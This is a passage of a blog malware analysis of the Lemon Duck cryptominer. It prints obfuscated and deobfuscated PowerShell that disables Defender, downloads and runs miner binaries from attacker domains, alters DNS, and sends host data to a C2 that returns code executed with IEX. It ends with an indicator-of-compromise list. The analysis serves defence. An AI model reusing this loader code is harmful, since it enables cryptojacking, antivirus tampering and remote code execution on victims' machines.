'+'F2Edomain = (Get-WmiObjec'+'t win32_comput'+'ersyst'+'em).Domain

F2Euptime = [timespan]::FromMilliseconds([environment]::TickCount)Wdnforeach{F2E_.totalseconds}

F2Ecpuname = (get-wmiobject '+'win32_processor).name

F2Ecard = (Get-WmiObject Win32_VideoController).name

F2Ecpu_per = JGAF2E((Get-WmiObject'+' -'+'Class Win32_Pr'+'ocessor).LoadPercentage)JGA

gwmi Win32_Physical'+'Memory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2Em'+'sum/1Gb

try{

F2Edrive = ([system.IO.DriveInfo]::GetDrives('+') '+'Wdn where {F2E_.IsReady -and (F2E_.AvailableFreeSpace -gt 1024) -and ((F2E_.DriveType -'+'eq JGARemovableJGA) -or (F2E_.DriveType -eq JGANetworkJGA)) -and ((F2E_.DriveFormat -eq JGANTFSJGA) -or (F2E_.DriveFormat -eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+'+'(F2E_.Dr'+'iveType.tostring())[0]})-joinJGAWdnJGA}catch{}

try{

[Reflection.Assembly]::LoadWithPar'+'tialName(JGASystem.Web.Extension'+'sJGA)

F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xw'+'-objd0xect net.webcd0xlient).JGAdownloadstring'+'JGA(E2Dhttp://127.0.0.1:43669/1/summaryE2D))

F2Emv=F2Eobj.version

F2Emip=F2Eobj.connection.ip
'+'
'+'F2Emhr=F2Eobj.hashrate.t'+'otal-join(E2D,E2D)}catch{}

try{

Set-MpPrefe'+'rence -DisableR'+'ealtimeMonitoring 1

Add-MpPreference -ExclusionPath c:q5E

Add-MpPreference -Exclusi'+'onProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShell'+'q5Ev1.0q5Ep'+'owershell.exe'+'

    Add-M'+'pPreference -ExclusionProcess c:q5Ewindowsq5Esystem32q5'+'EWindowsPowe'+'rShellq5Ev1.0q5EF2Ere'+'name

'+'}catch{}
'+'
if((F2Ecard -match '+'JGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}

if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}

F2Ev=F2Eurl.split(JGA?JGA)[1]

F2Eparams=@(F2Ev,F2Ecomp_name,F2Egui'+'d,F2Emac)-joinJGA&JGA

set-loca'+'tion F2Eenv:tmp

funct'+'ion s'+'tp(F2Egra){

    write-host F'+'2Egra

Start-Process -FilePath cmd.exe -ArgumentList JGA/c F2EgraJGA

}

function gcf(F2'+'Ecode,F2Emd,F2Efn){

(E2Decho E2D+F2Ecode+E2D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2Eenv:tmp+E'+'2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url='+'E2DE2DE'+'2D+F2Edow'+'n_url+E2DE2DE2D'+';function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().ComputeHash(F2E'+'con)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};return F2'+'Es}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp);F2Emd5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect Net'+'.WebCd0xlient).downloaddata('+'F2Edown_url+E2D'+'E2D/E2D+F2Efn+E2D?E2D+F2Eparams+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et-eqF2Eifmd5){[System.IO.File]::WriteA'+'llBytes(F2Eifp,F2Econ)}el'+'se{F2Enoup=1}'+'}if('+'F2Enoup){F2Econ=F2Econ_;F2Eifmd5=F2Emd5_}E2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&E2D,E2D^^^&E2D'+')

}

function gpa(F2Efnam,F2Ename){

(E2Dfor(F2Ei'+'=0;F2Ei -lt F2Econ.count'+'-1;F2Ei+=1){if(F2Econ[F2Ei] -eq 0x0a){brea'+'k}};id0xex(-join[char[]]F2Econ[0..F2Ei]);F2Ebin=(New'+'-Object IO.BinaryReader(New-Object System.IO.Co'+'mpression.GzipStream (New-Ob'+'ject System.IO.MemoryStream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), '+'([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000)'+';F2Ebin_=F2Ebin.Clone();F2Emep=F2Eenv:tmp+'+'E2DE2DE2D+JGA'+'q5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::WriteAllBytes(F2Emep,F2Ebin_+((1..127)WdnGet-Random -Count 100));test1 -PEBytes F2EbinE2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&'+'E2D,E2D^^^&E2D)+JGAWdnF'+'2Ename - &cmd /c copy /y %tmp'+'%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA

}

func'+'tion gpb(F2Ename'+'){

    E2DId0xEX(-join[char[]]F2Econ)WdnE2D+F2Ename+E2D -E2D

}

function gcode(F2Efl) {

E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Eflase;New-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocalE2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+E2D)}catch{}E2D

}

F2E'+'code1=gcode JGAIfJGA

Id0xEx F2Ecode1

if(F2ElocalIf){

st'+'p ((gcf F2Ecode1 F2Eifmd'+'5 F2Eifbin)+(gpb F2Erename))

}

if(F2Eis64){

F2E'+'c'+'ode2=gcode JGATMnJGA

Id0xEx F2Ecode2

if'+'(F2ElocalTMn){

stp ((gcf F2Ecode2 F2Emm'+'d5 F2Embin)+(gpa F2Embin F2Erename))

}

}

if((F2Eisn -or F2Eisa) -and F2Eis64){

F2Ecode3=gcode JGATMngJG'+'A

Id0xEx F2Ecode3

if(F2ElocalTMng){

stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emgbin'+' F2Erename))

}

}

F2Ecode4=gcod'+'e JGAKrJGA

Id0xEx F2Ecode4

if(F2ElocalKr){

stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb '+'F2Erename))

}

stp ('+'E2Decho try{F2Es=[System.Ne'+'t.Sockets.TcpListener]65529;F2Es.start();while(1){}}catch{}WdnE2D+F2Eren'+'ame+E2D -E2D)

F2Econf_f=test-path c:q5Ewindowsq5Esystem32q5EWindowsPowerSh'+'ellq5Ev1.0q5Econfi'+'gXXX1.json

F2Elmip=[System.Net.Dns]::GetHostAddresses(JGAp.b69kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }

F2Etpid,F2Etpname=(ge'+'t-'+'processWdnsort cpu -Descendin'+'gWdnselect-object'+' -first 1Wdnfore'+'ach{F2E_.id,F'+'2E_.processname})

F2Etcpconn = NetStat -anop TCP

F2Eipport=JGAJGA

foreach(F2Et in F2Etcpconn){

    F2Eline = F2Et.s'+'plit(E2D E2D)Wdn ? {F2E_}

    if (F2Eline'+' -eq F'+'2Enull) { continue }

    if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2Etpid)){

        F2Eipport = F2Eline[2]

        break

    }

}

try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@(E2D'+'8.8.8.8E2D,'+'E2D9.9.9.9E2D))}catch{}

F2Epar'+'ams+=JGA&JGA+(@(F'+'2Eos,[Int]F2Eis64,F2E'+'user,F2Edomain,F2E'+'drive,F2Ecpuname,F2Ecard'+',F2Emem,F2Ecpu_per,[In'+'t'+']F2Epermit,('+'F2Elifmd5'+'[0..5]-jo'+'inJGAJGA),(F2Elmmd5['+'0..5]-joinJGAJGA),(F2Elkrmd'+'5[0..'+'5]-joinJGAJGA),F2'+'Emv,F2Emip,F2Emhr'+',F2Euptim'+'e,[Int]F2Econf_f,F2Elmip,F2Etpna'+'me,F2Eipport,JGA0.9JGA)-joinJGA&JGA)

function SIEX {  

Param(

[string]F2Eurl

)

try{

F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient

F2Efinalurl = JGAF2EurlJGA+JGA?JGA+JGAF2EparamsJGA

'+'try{

F2Ewebclient'+'.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.re'+'place(E2D'+'q5EE2D,E2D-E2D))

} catch{}

F2Eres_bytes = F2Ewebclient.DownloadData('+'F2Efinalurl)

if(F2Eres_bytes.count -gt 173){

F2Esign_bytes = F2Eres'+'_bytes[0..171];

'+'F2Eraw_byte'+'s = F2Eres_bytes[173..F2Eres_bytes.count];

F2'+'ErsaParams = New-Object System.Security.Cryptograph'+'y.RSAParameters

F2ErsaParams.Modulus = 0xda,0x65,0xa8,0xd'+'7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,'+'0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0x'+'d1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x'+'34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6'+',0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0x'+'ea,0x38,0xb7,0x47,0x6b,0x5d

F2Er'+'saParams.Expon'+'ent = 0x01,0x00,0x01

F2Ers'+'a = New-Object -Ty'+'peName System.Security.Cryptography.RSACryptoServiceProvider;

F2Ersa.ImportP'+'arameters(F2ErsaParams)

F'+'2Ebas'+'e64 = -join([char[]]F2E'+'sign_bytes)

F2EbyteArray = [convert]::FromBase64String(F2Ebase64)

F2Esha1 = New-Object Syst'+'em.Secu'+'rity.Cryptography.SHA1CryptoServiceProvider

if(F2Ersa.verifyData(F2Eraw_bytes,F2Esha1,F2EbyteArray)) {

I'+'EX (-join[char[]]F2Eraw_bytes)

}

}

} catch{}

}

Start'+'-Sleep -Seconds 3

SIEX JGAF2Ecore_url/report.jspJGA

')-rEplAcE ([cHaR]87+[cHaR]100+[cHaR]110),[cHaR]124 -rEplAcE'E2D',[cHaR]39 -rEplAcE ([cHaR]70+[cHaR]50+[cHaR]69),[cHaR]36-crEPLAcE([cHaR]100+[cHaR]48+[cHaR]120),[cHaR]96-crEPLAcE'JGA',[cHaR]34 -rEplAcE ([cHaR]113+[cHaR]53+[cHaR]69),[cHaR]92) )

There is another layer of obsfucation here, so Malware Developer add various layer of absfucation in order to evade various AntiVirus products. Let’s Deobsfucate this layer.

Stage 4

This layer looks like some powershell code, I formatted it and added few comments as well.

# Checking the architecture wheather 64 bit or not
$is64=[int]([IntPtr]::Size -eq 8)

# Defining md5 hash of some if.bin and kr.bin file
#-------------------------------------block1--------------------
$ifbin="if.bin"
$ifmd5="04f9fdd312702343f074e5dd9a1ffe6f"

$krbin="kr.bin"
$krmd5="b7a1cfd74661361f71856388dac5aaa6"
#-------------------------------------block1--------------------

# If victim host is 64 bit then define some more md5 hash
if($is64){

    $mbin="m6.bin"
    $mmd5="32390a001e1207eafdd66e35c55aa9d3"
    $mgbin="m6g.bin"
    $mgmd5="26c0d79a29223e96ae52cb2775c96813"

}

# This function simply generates MD5 sum of input
function gmd5($d){
    [Security.Cryptography.MD5]::Create().ComputeHash($d)| foreach{ $l+=$_.ToString('x2')}
    return $l

}

# This file generates a random name and copies powershell file with that name
function getrname(){
    
    $rpath="C:\Windows\System32\Windowspowershell\V1.0"
    $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name}

    $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe"))

    foreach($ename in $enames){
        
        $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename"))
        
        if($tmd5 -eq $md5_){
            return $ename
        }
    }

    $ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"

    copy-item "$rpath\powershell.exe" "$rpath\$ename"|out-null

    if(!(test-path "$rpath\$ename")){
        $ename="powershell.exe"
        }
    return $ename
}

# Generated random name of powershell.exe file
$rename=getrname

# initializing some values
$lifmd5,$lmmd5,$lkrmd5="","",""


# This block checks if the binaries, if.bin, kr.bin, m.bin exist and if they do then calculated their MD5 sum
#---------------------------block2----------------------
try{
    $lifmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$ifbin"))
}
catch{}

try{
    $lmmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$mbin"))
}
catch{}

try{
    $lkrmd5=gmd5 ([IO.File]::ReadAllBytes("$env:tmp\$krbin"))
}
catch{}
#---------------------------block2----------------------


# This block defines some URLs varibles.
#-------------------URLs--------------------
$down_url = "http://d.u78wjdu.com"

if(!$url){
    $url="http://t.bb3u9.com"
}

$core_url = $url.split("/")[0..2]-join"/"
#-------------------URLs--------------------


# Checks if user has admin privelages
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")

# This block finds information about the host machine like , name, mac address, os version, usernmae, domain, graphic card, RAM etc
#---------------------------------------block 3----------------------------------------
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$cpuname = (get-wmiobject win32_processor).name
$card = (Get-WmiObject Win32_VideoController).name
$cpu_per = "$((Get-WmiObject -Class Win32_Processor).LoadPercentage)"

gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb
try{
    $drive = ([system.IO.DriveInfo]::GetDrives() | where {$_.IsReady -and ($_.AvailableFreeSpace -gt 1024) -and (($_.DriveType -eq "Removable") -or ($_.DriveType -eq "Network")) -and (($_.DriveFormat -eq "NTFS") -or ($_.DriveFormat -eq "FAT32"))} | foreach{($_.Name)[0]+"_"+($_.DriveType.tostring())[0]})-join"|"
}
catch{}
#---------------------------------------block 3----------------------------------------

# This checks if it can downloads data from localhost port 43669 and if it can then it sets some variables
try{
    [Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions")
    
    $obj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((new-object net.webclient)."downloadstring"('http://127.0.0.1:43669/1/summary'))

    $mv=$obj.version
    $mip=$obj.connection.ip
    $mhr=$obj.hashrate.total-join(',')
}
catch{}


# Then it tries to disable Defender's RealTimeMonitoring, and then Excludes C drive from scanning and also Excludes Powershell process and the renamed version of powershell process from scanning (This only works if run as admin, thus it is in try block )
try{
    
    Set-MpPreference -DisableRealtimeMonitoring 1
    Add-MpPreference -ExclusionPath c:\
    Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\$rename

}
catch{}


# Identifies the vendor of Graphic card
if(($card -match "GTX|NVIDIA|GEFORCE")){
    $isn=1
}
if(($card -match "Radeon|AMD")){
    $isa=1
}

# Creates a URL parameter by joining Comp Name and MAC
$v=$url.split("?")[1]
$params=@($v,$comp_name,$guid,$mac)-join"&"

# Goes to temp Directory
set-location $env:tmp

# A function to start process
function stp($gra){
    write-host $gra
    Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
}

function gcf($code,$md,$fn){
    ('echo '+$code+';
    $ifmd5='''+$md+''';
    $ifp=$env:tmp+''\'+$fn+''';
    $down_url='''+$down_url+''';
    
    function gmd5($con){
        [System.Security.Cryptography.MD5]::Create().ComputeHash($con) | foreach{$s+=$_.ToString(''x2'')};
        return $s
    }
    if(test-path $ifp){
        $con_=[System.IO.File]::ReadAllBytes($ifp);
        $md5_=gmd5 $con_;
        if($md5_-eq$ifmd5){
            $noup=1
        }
    }
    if(!$noup){
        $con=(New-Object Net.WebClient).downloaddata($down_url+''/'+$fn+'?'+$params+''');
        $t=gmd5 $con;
        if($t-eq$ifmd5){
            [System.IO.File]::WriteAllBytes($ifp,$con)
        }
        else{
            $noup=1
        }
    }
    if($noup){
        $con=$con_;
        $ifmd5=$md5_
    }').replace('|','^^^|').replace('&','^^^&')
}

function gpa($fnam,$name){
    ('for($i=0;$i -lt $con.count-1;$i+=1){
        if($con[$i] -eq 0x0a){
            break
        }
    };
    iex(-join[char[]]$con[0..$i]);
    $bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);
    
    $bin_=$bin.Clone();
    $mep=$env:tmp+'''+"\$fnam.ori"+''';
    [System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));
    test1 -PEBytes $bin'
    ).replace('|','^^^|').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
}

function gpb($name){
    'IEX(-join[char[]]$con)|'+$name+' -'
}

function gcode($fl) {
    'try{
        $local'+$fl+'=$flase;
        New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')
    }
    catch{}'
}

$code1=gcode "If"
IEx $code1

if($localIf){
    stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
}

if($is64){
    $code2=gcode "TMn"

    IEx $code2
    if($localTMn){
        stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
    }
}

if(($isn -or $isa) -and $is64){
    
    $code3=gcode "TMng"
    IEx $code3
    
    if($localTMng){
        stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
    }
}

$code4=gcode "Kr"
IEx $code4

if($localKr){
    stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
}

stp ('echo try{
    $s=[System.Net.Sockets.TcpListener]65529;
    $s.start();
    while(1){}
    }
    catch{}|'+$rename+' -')


$conf_f=test-path c:\windows\system32\WindowsPowerShell\v1.0\configXXX1.json

$lmip=[System.Net.Dns]::GetHostAddresses("p.b69kq.com") | foreach {echo $_.IPAddressToString }

$tpid,$tpname=(get-process|sort cpu -Descending|select-object -first 1|foreach{$_.id,$_.processname})

$tcpconn = NetStat -anop TCP

$ipport=""

foreach($t in $tcpconn){

    $line = $t.split(' ')| ? {$_}
    if ($line -eq $null) {
        continue 
    }

    if($t.contains("ESTABLISHED") -and ($line[-1] -eq $tpid)){
        $ipport = $line[2]
        break
    }
}

try{
    (get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))
}
catch{}

$params+="&"+(@($os,[Int]$is64,$user,$domain,$drive,$cpuname,$card,$mem,$cpu_per,[Int]$permit,($lifmd5[0..5]-join""),($lmmd5[0..5]-join""),($lkrmd5[0..5]-join""),$mv,$mip,$mhr,$uptime,[Int]$conf_f,$lmip,$tpname,$ipport,"0.9")-join"&")

function SIEX {  
    Param([string]$url)
    
    try{
        $webclient = New-Object Net.WebClient
        $finalurl = "$url"+"?"+"$params"
    try{
        $webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('\','-'))
    }
    catch{}
    $res_bytes = $webclient.DownloadData($finalurl)
    if($res_bytes.count -gt 173){
        $sign_bytes = $res_bytes[0..171];
        $raw_bytes = $res_bytes[173..$res_bytes.count];
        $rsaParams = New-Object System.Security.Cryptography.RSAParameters
        
        $rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
        
        $rsaParams.Exponent = 0x01,0x00,0x01

        $rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
        $rsa.ImportParameters($rsaParams)
        
        $base64 = -join([char[]]$sign_bytes)
        $byteArray = [convert]::FromBase64String($base64)
        
        $sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
        
        if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
            IEX (-join[char[]]$raw_bytes)
            }
        }
    } 
    catch{}
}

Start-Sleep -Seconds 3
SIEX "$core_url/report.jsp"

IOC

IOC (Indicators Of Compromise) are pieces of data, such as data found in log entries or files, that identify potentially malicious activity on a system or network, This IOC helps in identifying the systems which might be affected by the malware, for example, if malware communicates with an external IP address, then any system that requested that particular IP address is considered to be infected by malware.

So In this malware the potential IOC’c are:

Any HTTP requests made to “hxxps[://]t[.]zz3ro[.]com”, “hxxps[://]t[.]zker9[.]com” or “hxxps[://]t[.]bb3u9[.]com” (URLs are defanged, to prevent any accidental click)
Presence of scheduled task, with name as blackball, or with same random names.
Presence of some open ports like pot no. 65529
Presence of an event with the name blackball
Automatically uninstalled some antiviruses

You can get the scripts that i extracted and the IOC’s we dertermined from this github repository

Thanks for Reading, Stay tuned for more ❤︎

If you enjoyed reading the article do follow me on:

Twitter

Website

GitHub\

Malware Analysis:Lemon Duck CryptoMiner (a.jsp) : Part II

Stage 0

Stage 1

Stage 2

Stage 3

Stage 4

IOC

Further Reading

Malware Analysis: Malicious Document File I

Malware Analysis:Lemon Duck CryptoMiner (mail.jsp) : Part I

Building a Malware Analysis Lab : Windows 7

Trending Tags